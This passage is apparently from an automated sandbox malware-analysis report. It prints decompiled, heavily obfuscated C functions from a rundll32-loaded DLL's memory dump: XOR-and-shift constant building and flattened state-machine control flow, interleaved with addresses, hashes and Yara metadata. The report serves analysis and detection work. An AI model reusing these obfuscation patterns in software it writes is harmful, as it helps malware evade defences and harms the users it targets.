                                                                        0x1001202a
                                                                        0x1001207f
                                                                        0x1001207f
                                                                        0x1001208c

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ;_@$?$@$h_@$h~$4
                                                                        • API String ID: 0-1313548790
                                                                        • Opcode ID: 19c60eb2fc9d772e2184e1397d5d84d04df9bbe5c21165f98c8c15ce99fbaf5a
                                                                        • Instruction ID: b19c1ca6e3d31d4d4ef9159ac445c0ba32e9153f74aa0842d826561c908fa0a9
                                                                        • Opcode Fuzzy Hash: 19c60eb2fc9d772e2184e1397d5d84d04df9bbe5c21165f98c8c15ce99fbaf5a
                                                                        • Instruction Fuzzy Hash: 46610EB55083419FE354CF21C48940BFBF1FB88798F505E1DF596662A0C3B5AA89CF86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10007605, Relevance: 6.4, Strings: 5, Instructions: 127COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10007605() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t110;
				void* _t118;
				signed int _t120;
				signed int _t135;
				signed int _t136;
				short* _t137;
				signed int* _t140;

				_t140 =  &_v568;
				_v524 = _v524 & 0x00000000;
				_v528 = 0x1387ac;
				_t118 = 0x4e41429;
				_v552 = 0x9cc8;
				_v552 = _v552 * 0xb;
				_v552 = _v552 | 0x98122ffa;
				_v552 = _v552 ^ 0x9816c8f2;
				_v548 = 0xc79b;
				_v548 = _v548 << 5;
				_v548 = _v548 >> 6;
				_v548 = _v548 ^ 0x00001472;
				_v560 = 0x2de7;
				_t135 = 0xb;
				_v560 = _v560 / _t135;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 | 0x0a536918;
				_v560 = _v560 ^ 0x0a532199;
				_v536 = 0x89b4;
				_v536 = _v536 + 0xffff0cb8;
				_v536 = _v536 ^ 0xffffc1bc;
				_v532 = 0xdd21;
				_v532 = _v532 + 0xb061;
				_v532 = _v532 ^ 0x0001daa7;
				_v564 = 0x77e3;
				_t136 = 0x1c;
				_v564 = _v564 * 0x76;
				_v564 = _v564 << 0xc;
				_v564 = _v564 + 0xffff5cda;
				_v564 = _v564 ^ 0x74296bf4;
				_v556 = 0x240d;
				_t110 = _v556 / _t136;
				_v556 = _t110;
				_v556 = _v556 + 0xcc42;
				_v556 = _v556 >> 7;
				_v556 = _v556 ^ 0x00001fe6;
				_v544 = 0x5b3d;
				_v544 = _v544 + 0xffffa256;
				_v544 = _v544 ^ 0xffff9726;
				_t137 = _v544;
				_v540 = 0x5d73;
				_v540 = _v540 + 0xffff95f2;
				_v540 = _v540 ^ 0xffff9ed1;
				L1:
				while(_t118 != 0x2493963) {
					if(_t118 == 0x4e41429) {
						_t118 = 0x2493963;
						continue;
					}
					if(_t118 == 0x95c6af5) {
						return E10015891(_t137,  *0x100221b0 + 0x10, _v556, _v544, _v540);
					}
					if(_t118 != 0x1ce20f0e) {
						L15:
						__eflags = _t118 - 0x278615fa;
						if(__eflags != 0) {
							continue;
						}
						return _t110;
					}
					_v568 = 0x3f77;
					_v568 = _v568 ^ 0x040fc81f;
					_t120 = 0x71;
					_v568 = _v568 / _t120;
					_v568 = _v568 >> 4;
					_v568 = _v568 ^ 0x00009342;
					_t137 =  &_v520 + E1001BBAB(_v536, _v532,  &_v520, _v564) * 2;
					while(1) {
						_t110 =  &_v520;
						if(_t137 <= _t110) {
							break;
						}
						__eflags =  *_t137 - 0x5c;
						if( *_t137 != 0x5c) {
							L8:
							_t137 = _t137 - 2;
							__eflags = _t137;
							continue;
						}
						_t94 =  &_v568;
						 *_t94 = _v568 - 1;
						__eflags =  *_t94;
						if( *_t94 == 0) {
							__eflags = _t137;
							L12:
							_t118 = 0x95c6af5;
							goto L1;
						}
						goto L8;
					}
					goto L12;
				}
				_t110 = E10008C0C(_v552, __eflags, _v548, _v560,  &_v520);
				_t140 =  &(_t140[3]);
				_t118 = 0x1ce20f0e;
				goto L15;
			}























                                                                        0x10007605
                                                                        0x1000760b
                                                                        0x10007612
                                                                        0x1000761a
                                                                        0x1000761f
                                                                        0x10007630
                                                                        0x10007639
                                                                        0x10007646
                                                                        0x10007653
                                                                        0x1000765b
                                                                        0x10007660
                                                                        0x10007665
                                                                        0x1000766d
                                                                        0x1000767b
                                                                        0x10007680
                                                                        0x10007686
                                                                        0x1000768b
                                                                        0x10007693
                                                                        0x1000769b
                                                                        0x100076a3
                                                                        0x100076ab
                                                                        0x100076b3
                                                                        0x100076bb
                                                                        0x100076c3
                                                                        0x100076cb
                                                                        0x100076d8
                                                                        0x100076d9
                                                                        0x100076dd
                                                                        0x100076e2
                                                                        0x100076ea
                                                                        0x100076f2
                                                                        0x100076fe
                                                                        0x10007700
                                                                        0x10007704
                                                                        0x1000770c
                                                                        0x10007711
                                                                        0x10007719
                                                                        0x10007721
                                                                        0x10007729
                                                                        0x10007731
                                                                        0x10007735
                                                                        0x1000773d
                                                                        0x10007745
                                                                        0x00000000
                                                                        0x1000774d
                                                                        0x1000775b
                                                                        0x100077e1
                                                                        0x00000000
                                                                        0x100077e1
                                                                        0x10007763
                                                                        0x00000000
                                                                        0x1000782d
                                                                        0x1000776b
                                                                        0x10007803
                                                                        0x10007803
                                                                        0x10007809
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10007809
                                                                        0x10007771
                                                                        0x1000777b
                                                                        0x10007789
                                                                        0x1000778c
                                                                        0x10007794
                                                                        0x10007799
                                                                        0x100077b9
                                                                        0x100077cd
                                                                        0x100077cd
                                                                        0x100077d3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100077be
                                                                        0x100077c2
                                                                        0x100077ca
                                                                        0x100077ca
                                                                        0x100077ca
                                                                        0x00000000
                                                                        0x100077ca
                                                                        0x100077c4
                                                                        0x100077c4
                                                                        0x100077c4
                                                                        0x100077c8
                                                                        0x100077d7
                                                                        0x100077da
                                                                        0x100077da
                                                                        0x00000000
                                                                        0x100077da
                                                                        0x00000000
                                                                        0x100077c8
                                                                        0x00000000
                                                                        0x100077d5
                                                                        0x100077f9
                                                                        0x100077fe
                                                                        0x10007801
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$=[$s]$w?$w
                                                                        • API String ID: 0-3700477970
                                                                        • Opcode ID: 62ff0d1c6547e0b70e078bd31fc65c68330c9ee5d58cb8db6e1cf70575695e7b
                                                                        • Instruction ID: 1a6987bc6c1846451349bb2a40725533db3d3377cb45e9f1ccf3a4716e170320
                                                                        • Opcode Fuzzy Hash: 62ff0d1c6547e0b70e078bd31fc65c68330c9ee5d58cb8db6e1cf70575695e7b
                                                                        • Instruction Fuzzy Hash: DC51497190C3429FE364CF25D44941FBBE1FBC4798F104A1EF599662A4D3B89A49CF82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100094EC, Relevance: 5.2, Strings: 4, Instructions: 209COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E100094EC() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				short* _t218;
				void* _t223;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t270;
				void* _t272;

				_t272 = (_t270 & 0xfffffff8) - 0x258;
				_v552 = 0xc5de;
				_v552 = _v552 << 0xb;
				_t223 = 0x10e191ba;
				_v552 = _v552 * 0xa;
				_v552 = _v552 ^ 0x3dd55649;
				_v528 = 0xd7a0;
				_v528 = _v528 ^ 0xb5a30bcc;
				_v528 = _v528 ^ 0xb5a3bef7;
				_v576 = 0xa7dd;
				_v576 = _v576 << 0xe;
				_t258 = 0x27;
				_v576 = _v576 / _t258;
				_v576 = _v576 ^ 0x011311a2;
				_v588 = 0x76f2;
				_v588 = _v588 | 0xcad6357e;
				_v588 = _v588 ^ 0x58bbddc5;
				_v588 = _v588 ^ 0x926db7d7;
				_v604 = 0x542d;
				_v604 = _v604 ^ 0xdabf7200;
				_v604 = _v604 | 0x518ac0ce;
				_v604 = _v604 + 0xffff5d7d;
				_v604 = _v604 ^ 0xdbbf6591;
				_v536 = 0x6f2;
				_v536 = _v536 ^ 0xb7ff586a;
				_v536 = _v536 ^ 0xb7ff59fe;
				_v564 = 0x9bc0;
				_t259 = 0x60;
				_v564 = _v564 * 0x77;
				_v564 = _v564 + 0xffff74e2;
				_v564 = _v564 ^ 0x0047e104;
				_v556 = 0xec1b;
				_v556 = _v556 * 0x26;
				_v556 = _v556 >> 3;
				_v556 = _v556 ^ 0x0004652b;
				_v568 = 0x50db;
				_v568 = _v568 / _t259;
				_v568 = _v568 << 8;
				_v568 = _v568 ^ 0x0000bb9e;
				_v540 = 0x45e;
				_t260 = 0x2a;
				_v540 = _v540 / _t260;
				_v540 = _v540 ^ 0x00003856;
				_v600 = 0xdcf5;
				_v600 = _v600 >> 0xb;
				_t261 = 0x55;
				_v600 = _v600 / _t261;
				_v600 = _v600 + 0xffff3d4e;
				_v600 = _v600 ^ 0xffff3115;
				_v544 = 0xeb2c;
				_v544 = _v544 | 0xbe9f19ff;
				_v544 = _v544 ^ 0xbe9ffb48;
				_v560 = 0x6b9e;
				_v560 = _v560 | 0x0e8ada92;
				_v560 = _v560 + 0xfffff2fa;
				_v560 = _v560 ^ 0x0e8af134;
				_v572 = 0xb259;
				_v572 = _v572 ^ 0x7ea6fcad;
				_v572 = _v572 * 0x50;
				_v572 = _v572 ^ 0x93f8b0e2;
				_v596 = 0x3f12;
				_t262 = 0x14;
				_v596 = _v596 * 0x3e;
				_v596 = _v596 | 0x39de80ab;
				_v596 = _v596 + 0x6fd8;
				_v596 = _v596 ^ 0x39e00adb;
				_v548 = 0xf59e;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 ^ 0x00004a18;
				_v532 = 0xef88;
				_v532 = _v532 / _t262;
				_v532 = _v532 ^ 0x00005e97;
				_v580 = 0xce2c;
				_t263 = 0x1d;
				_v580 = _v580 * 0x38;
				_v580 = _v580 / _t263;
				_v580 = _v580 ^ 0x00019ca1;
				_v584 = 0xcb97;
				_t264 = 0x7c;
				_v584 = _v584 * 0x5a;
				_v584 = _v584 * 0x11;
				_v584 = _v584 ^ 0x04c0b349;
				_v592 = 0xb13f;
				_v592 = _v592 / _t264;
				_v592 = _v592 * 0x6b;
				_v592 = _v592 | 0xb06a3ec2;
				_v592 = _v592 ^ 0xb06acb10;
				do {
					while(_t223 != 0xd11567f) {
						if(_t223 == 0xdefeb70) {
							_push(0x10001000);
							_push(_v576);
							E100163BF(E1001BF25(_v552, _v528, __eflags), __eflags, _v604, _v536,  &_v524,  *0x100221b0 + 0x234, _v564,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v556);
							_t218 = E1001C5F7(_v568, _v540, _v600, _v544, _t215);
							_t272 = _t272 + 0x2c;
							_t223 = 0x285c1f68;
							continue;
						} else {
							if(_t223 == 0x10e191ba) {
								_t223 = 0xdefeb70;
								continue;
							} else {
								if(_t223 == 0x285c1f68) {
									_t218 = E10001E13(_v560, _v572, _v596, _v548,  &_v524);
									_t272 = _t272 + 0xc;
									 *_t218 = 0;
									_t223 = 0xd11567f;
									continue;
								}
							}
						}
						goto L9;
					}
					E10004EA1( &_v524, _v532, _v580, _v584,  &_v524, E10017570, _v592, 0);
					_t272 = _t272 + 0x18;
					_t223 = 0x1084920c;
					L9:
					__eflags = _t223 - 0x1084920c;
				} while (__eflags != 0);
				return _t218;
			}



































                                                                        0x100094f2
                                                                        0x100094f8
                                                                        0x10009502
                                                                        0x10009507
                                                                        0x10009515
                                                                        0x10009519
                                                                        0x10009521
                                                                        0x10009529
                                                                        0x10009531
                                                                        0x10009539
                                                                        0x10009541
                                                                        0x1000954c
                                                                        0x10009551
                                                                        0x10009557
                                                                        0x1000955f
                                                                        0x10009567
                                                                        0x1000956f
                                                                        0x10009577
                                                                        0x1000957f
                                                                        0x10009587
                                                                        0x1000958f
                                                                        0x10009597
                                                                        0x1000959f
                                                                        0x100095a7
                                                                        0x100095af
                                                                        0x100095b7
                                                                        0x100095bf
                                                                        0x100095cc
                                                                        0x100095cf
                                                                        0x100095d3
                                                                        0x100095db
                                                                        0x100095e3
                                                                        0x100095f0
                                                                        0x100095f4
                                                                        0x100095f9
                                                                        0x10009601
                                                                        0x10009611
                                                                        0x10009615
                                                                        0x1000961a
                                                                        0x10009622
                                                                        0x1000962e
                                                                        0x10009633
                                                                        0x10009639
                                                                        0x10009641
                                                                        0x10009649
                                                                        0x10009652
                                                                        0x10009655
                                                                        0x10009659
                                                                        0x10009661
                                                                        0x10009669
                                                                        0x10009671
                                                                        0x10009679
                                                                        0x10009681
                                                                        0x10009689
                                                                        0x10009691
                                                                        0x10009699
                                                                        0x100096a1
                                                                        0x100096a9
                                                                        0x100096b6
                                                                        0x100096bc
                                                                        0x100096c9
                                                                        0x100096e2
                                                                        0x100096e5
                                                                        0x100096e9
                                                                        0x100096f1
                                                                        0x100096f9
                                                                        0x10009701
                                                                        0x10009709
                                                                        0x1000970e
                                                                        0x10009716
                                                                        0x10009726
                                                                        0x1000972a
                                                                        0x10009732
                                                                        0x1000973f
                                                                        0x10009742
                                                                        0x1000974e
                                                                        0x10009752
                                                                        0x1000975a
                                                                        0x10009767
                                                                        0x10009768
                                                                        0x10009771
                                                                        0x10009775
                                                                        0x1000977d
                                                                        0x1000978b
                                                                        0x10009794
                                                                        0x10009798
                                                                        0x100097a0
                                                                        0x100097a8
                                                                        0x100097a8
                                                                        0x100097b2
                                                                        0x100097f2
                                                                        0x100097f7
                                                                        0x10009839
                                                                        0x1000984f
                                                                        0x10009854
                                                                        0x10009857
                                                                        0x00000000
                                                                        0x100097b4
                                                                        0x100097ba
                                                                        0x100097ee
                                                                        0x00000000
                                                                        0x100097bc
                                                                        0x100097c2
                                                                        0x100097dd
                                                                        0x100097e2
                                                                        0x100097e7
                                                                        0x100097ea
                                                                        0x00000000
                                                                        0x100097ea
                                                                        0x100097c2
                                                                        0x100097ba
                                                                        0x00000000
                                                                        0x100097b2
                                                                        0x1000987f
                                                                        0x10009884
                                                                        0x10009887
                                                                        0x10009889
                                                                        0x10009889
                                                                        0x10009889
                                                                        0x10009898

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,$-T$V8$p
                                                                        • API String ID: 0-3916372523
                                                                        • Opcode ID: fe2cff7067093b2d558a9cecacae9b5ad41a5273b9a4ffd5d244425a66effca3
                                                                        • Instruction ID: 69ffcb7ec9cb319a1ce736737d15c81d771b3a6a0237c0b4041a3b002347b657
                                                                        • Opcode Fuzzy Hash: fe2cff7067093b2d558a9cecacae9b5ad41a5273b9a4ffd5d244425a66effca3
                                                                        • Instruction Fuzzy Hash: 80A130711093419FE358CF26C98680BFBF1FBC5758F40891DF6A69A2A0D3B599098F82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100177C0, Relevance: 5.1, Strings: 4, Instructions: 142COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E100177C0(signed int __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				intOrPtr _t112;
				intOrPtr _t115;
				signed int _t117;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				void* _t124;
				signed int _t136;
				void* _t137;
				signed int _t140;
				intOrPtr* _t143;
				signed int* _t144;

				_t144 =  &_v564;
				_v532 = 0x1772;
				_v532 = _v532 * 0x5a;
				_t143 = __edx;
				_v532 = _v532 >> 9;
				_v532 = _v532 ^ 0x00005570;
				_t120 = __ecx;
				_v536 = 0xd4de;
				_t137 = 0xee39a7c;
				_v536 = _v536 + 0xf33a;
				_v536 = _v536 ^ 0x38a2f836;
				_v536 = _v536 ^ 0x38a37f8b;
				_v548 = 0x7513;
				_v548 = _v548 | 0x052e2a6a;
				_v548 = _v548 ^ 0x1a009472;
				_v548 = _v548 ^ 0x1f2ec1f2;
				_v524 = 0xa699;
				_v524 = _v524 ^ 0x09ca44e2;
				_v524 = _v524 ^ 0x09cad658;
				_v564 = 0x9128;
				_v564 = _v564 >> 2;
				_v564 = _v564 << 9;
				_v564 = _v564 | 0x50e7f59d;
				_v564 = _v564 ^ 0x50ef90e4;
				_v556 = 0x80f2;
				_v556 = _v556 >> 0xb;
				_v556 = _v556 ^ 0x31791c1d;
				_v556 = _v556 + 0x8ae1;
				_v556 = _v556 ^ 0x3179d51e;
				_v540 = 0x4387;
				_t122 = 0x3f;
				_v540 = _v540 / _t122;
				_v540 = _v540 ^ 0x58e2e29e;
				_v540 = _v540 ^ 0x58e2cc49;
				_v552 = 0xa082;
				_v552 = _v552 ^ 0xcad17016;
				_v552 = _v552 + 0xffff4873;
				_v552 = _v552 ^ 0x78230127;
				_v552 = _v552 ^ 0xb2f23b2e;
				_v528 = 0x3f9f;
				_t123 = 0x42;
				_v528 = _v528 / _t123;
				_v528 = _v528 ^ 0x00000484;
				_t136 = _v528;
				_v560 = 0x7d41;
				_v560 = _v560 << 4;
				_v560 = _v560 * 0x2b;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 ^ 0x00006e49;
				_v544 = 0x2431;
				_v544 = _v544 ^ 0x7eed52f8;
				_v544 = _v544 | 0x8f6fe496;
				_v544 = _v544 ^ 0xffefc65f;
				while(_t137 != 0x5fcbc3f) {
					if(_t137 != 0xee39a7c) {
						if(_t137 == 0x11ea9c68) {
							_push( &_v520);
							_t117 = E10002628(_t120, _t143);
							asm("sbb esi, esi");
							_t123 = 0x10001318;
							_t140 =  ~_t117 & 0x1fda4e6f;
							goto L7;
						} else {
							if(_t137 == 0x1790ebe1) {
								return E100091CD(_v552, _v528, _v560, _t136, _v544);
							}
							_t151 = _t137 - 0x376b3a50;
							if(_t137 != 0x376b3a50) {
								L12:
								__eflags = _t137 - 0x7fc7711;
								if(__eflags != 0) {
									continue;
								} else {
									return _t117;
								}
								L16:
							} else {
								_push(_v540);
								_push(0);
								_push(0);
								_push(_t123);
								_push(_v556);
								_push(_v564);
								_t123 = _v548;
								_push( &_v520);
								_push(0);
								_t117 = E100189F6(_t123, _v524, _t151);
								_t144 =  &(_t144[8]);
								asm("sbb esi, esi");
								_t140 =  ~_t117 & 0xee6bd05e;
								L7:
								_t137 = _t140 + 0x1790ebe1;
								continue;
							}
						}
					}
					_t124 = 0x24;
					_t115 = E100157E8(_t124);
					_t136 = _t115;
					_t123 = _t123;
					__eflags = _t136;
					if(__eflags != 0) {
						_t137 = 0x11ea9c68;
						continue;
					}
					return _t115;
					goto L16;
				}
				 *((intOrPtr*)(_t136 + 0x20)) = _t120;
				_t137 = 0x7fc7711;
				_t112 =  *0x10021400; // 0x0
				 *((intOrPtr*)(_t136 + 0x10)) = _t112;
				 *0x10021400 = _t136;
				goto L12;
			}



























                                                                        0x100177c0
                                                                        0x100177c6
                                                                        0x100177d7
                                                                        0x100177db
                                                                        0x100177dd
                                                                        0x100177e4
                                                                        0x100177ec
                                                                        0x100177ee
                                                                        0x100177f6
                                                                        0x100177fb
                                                                        0x10017803
                                                                        0x1001780b
                                                                        0x10017813
                                                                        0x1001781b
                                                                        0x10017823
                                                                        0x1001782b
                                                                        0x10017833
                                                                        0x1001783b
                                                                        0x10017843
                                                                        0x1001784b
                                                                        0x10017853
                                                                        0x10017858
                                                                        0x1001785d
                                                                        0x10017865
                                                                        0x1001786d
                                                                        0x10017875
                                                                        0x1001787a
                                                                        0x10017882
                                                                        0x1001788a
                                                                        0x10017892
                                                                        0x100178a0
                                                                        0x100178a5
                                                                        0x100178ab
                                                                        0x100178b3
                                                                        0x100178bb
                                                                        0x100178c3
                                                                        0x100178cb
                                                                        0x100178d3
                                                                        0x100178db
                                                                        0x100178e3
                                                                        0x100178ef
                                                                        0x100178f2
                                                                        0x100178f6
                                                                        0x100178fe
                                                                        0x10017902
                                                                        0x1001790a
                                                                        0x10017914
                                                                        0x10017918
                                                                        0x1001791d
                                                                        0x10017925
                                                                        0x1001792d
                                                                        0x10017935
                                                                        0x1001793d
                                                                        0x10017945
                                                                        0x10017957
                                                                        0x1001795f
                                                                        0x100179bb
                                                                        0x100179c3
                                                                        0x100179cd
                                                                        0x100179cf
                                                                        0x100179d0
                                                                        0x00000000
                                                                        0x10017961
                                                                        0x10017967
                                                                        0x00000000
                                                                        0x10017a34
                                                                        0x1001796d
                                                                        0x10017973
                                                                        0x10017a10
                                                                        0x10017a10
                                                                        0x10017a16
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10017979
                                                                        0x10017979
                                                                        0x10017981
                                                                        0x10017983
                                                                        0x10017985
                                                                        0x10017986
                                                                        0x1001798a
                                                                        0x10017992
                                                                        0x10017996
                                                                        0x10017997
                                                                        0x10017999
                                                                        0x1001799e
                                                                        0x100179a5
                                                                        0x100179a7
                                                                        0x100179ad
                                                                        0x100179ad
                                                                        0x00000000
                                                                        0x100179ad
                                                                        0x10017973
                                                                        0x1001795f
                                                                        0x100179e3
                                                                        0x100179e4
                                                                        0x100179e9
                                                                        0x100179eb
                                                                        0x100179ec
                                                                        0x100179ee
                                                                        0x100179f0
                                                                        0x00000000
                                                                        0x100179f0
                                                                        0x10017a41
                                                                        0x00000000
                                                                        0x10017a41
                                                                        0x100179fa
                                                                        0x100179fd
                                                                        0x10017a02
                                                                        0x10017a07
                                                                        0x10017a0a
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 1$$In$P:k7$pU
                                                                        • API String ID: 0-2106264963
                                                                        • Opcode ID: a6b8b6057752e44647db78beeb2ee1f3202c3f20c0f29efe6dfe5a7aead6b88d
                                                                        • Instruction ID: 2e7f08dc6bef0bd5653fe598f332924a89a4fdabe7864c0509b3b532d9c0389b
                                                                        • Opcode Fuzzy Hash: a6b8b6057752e44647db78beeb2ee1f3202c3f20c0f29efe6dfe5a7aead6b88d
                                                                        • Instruction Fuzzy Hash: D2516B719083419BD358DF21D48694BBBF0FBC8758F501A1DF9DAAA260C3B4DA49CB87
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001DEE8, Relevance: 5.1, Strings: 4, Instructions: 123COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E1001DEE8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				void* _t134;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t134);
				_v56 = _v56 & 0x00000000;
				_v60 = 0x429fa3;
				_v16 = 0x8df8;
				_v16 = _v16 | 0x5bad6fdd;
				_v16 = _v16 ^ 0x1c317be5;
				_v16 = _v16 ^ 0x479cc3d4;
				_v12 = 0xa64d;
				_t151 = 0x35;
				_v12 = _v12 / _t151;
				_v12 = _v12 + 0xfffff8cf;
				_v12 = _v12 | 0x0b89d292;
				_v12 = _v12 ^ 0xffff912a;
				_v8 = 0x343c;
				_v8 = _v8 + 0xdfbd;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x831c11fe;
				_v8 = _v8 ^ 0x831c1bf9;
				_v20 = 0xd2ea;
				_v20 = _v20 << 0xb;
				_v20 = _v20 + 0xffff01f9;
				_t152 = 0x3f;
				_v20 = _v20 / _t152;
				_v20 = _v20 ^ 0x001a8b92;
				_v52 = 0xabad;
				_v52 = _v52 ^ 0xf345eb5d;
				_v52 = _v52 ^ 0xf3453027;
				_v40 = 0x2a5b;
				_v40 = _v40 ^ 0x8a944271;
				_v40 = _v40 + 0xffff3ddd;
				_v40 = _v40 ^ 0x8a93ae26;
				_v36 = 0xa033;
				_t153 = 0x2a;
				_v36 = _v36 / _t153;
				_v36 = _v36 >> 7;
				_v36 = _v36 ^ 0x000061ee;
				_v32 = 0x8be0;
				_v32 = _v32 | 0xe631180e;
				_v32 = _v32 << 0xc;
				_v32 = _v32 ^ 0x19bef193;
				_v48 = 0xa7b3;
				_t154 = 0x44;
				_v48 = _v48 * 0x60;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0xb8c85214;
				_v28 = 0x762;
				_v28 = _v28 | 0x9c151205;
				_v28 = _v28 << 8;
				_v28 = _v28 >> 8;
				_v28 = _v28 ^ 0x0015065a;
				_v44 = 0x58a5;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 / _t154;
				_v44 = _v44 ^ 0x00007339;
				_v24 = 0xfaea;
				_v24 = _v24 << 3;
				_v24 = _v24 + 0xd2b0;
				_t155 = 3;
				_push(0x100015c0);
				_v24 = _v24 / _t155;
				_v24 = _v24 ^ 0x00028589;
				_push(_v8);
				E100163BF(E1001BF25(_v16, _v12, _v24), _v24, _v52, _v40, __edx, _v16, _v36, _a12, _a8, _v32);
				return E1001C5F7(_v48, _v28, _v44, _v24, _t147);
			}























                                                                        0x1001def0
                                                                        0x1001def5
                                                                        0x1001def8
                                                                        0x1001defb
                                                                        0x1001defe
                                                                        0x1001deff
                                                                        0x1001df00
                                                                        0x1001df05
                                                                        0x1001df0b
                                                                        0x1001df12
                                                                        0x1001df19
                                                                        0x1001df20
                                                                        0x1001df27
                                                                        0x1001df2e
                                                                        0x1001df3a
                                                                        0x1001df3f
                                                                        0x1001df44
                                                                        0x1001df4b
                                                                        0x1001df52
                                                                        0x1001df59
                                                                        0x1001df60
                                                                        0x1001df67
                                                                        0x1001df6b
                                                                        0x1001df72
                                                                        0x1001df79
                                                                        0x1001df80
                                                                        0x1001df84
                                                                        0x1001df8e
                                                                        0x1001df93
                                                                        0x1001df98
                                                                        0x1001df9f
                                                                        0x1001dfa6
                                                                        0x1001dfad
                                                                        0x1001dfb4
                                                                        0x1001dfbb
                                                                        0x1001dfc2
                                                                        0x1001dfc9
                                                                        0x1001dfd0
                                                                        0x1001dfda
                                                                        0x1001dfdf
                                                                        0x1001dfe4
                                                                        0x1001dfe8
                                                                        0x1001dfef
                                                                        0x1001dff6
                                                                        0x1001dffd
                                                                        0x1001e001
                                                                        0x1001e008
                                                                        0x1001e013
                                                                        0x1001e014
                                                                        0x1001e017
                                                                        0x1001e01b
                                                                        0x1001e022
                                                                        0x1001e029
                                                                        0x1001e030
                                                                        0x1001e034
                                                                        0x1001e038
                                                                        0x1001e03f
                                                                        0x1001e046
                                                                        0x1001e04f
                                                                        0x1001e052
                                                                        0x1001e059
                                                                        0x1001e060
                                                                        0x1001e066
                                                                        0x1001e072
                                                                        0x1001e075
                                                                        0x1001e07a
                                                                        0x1001e07d
                                                                        0x1001e084
                                                                        0x1001e0b0
                                                                        0x1001e0cf

                                                                        Strings
                                                                        Memory Dump Source
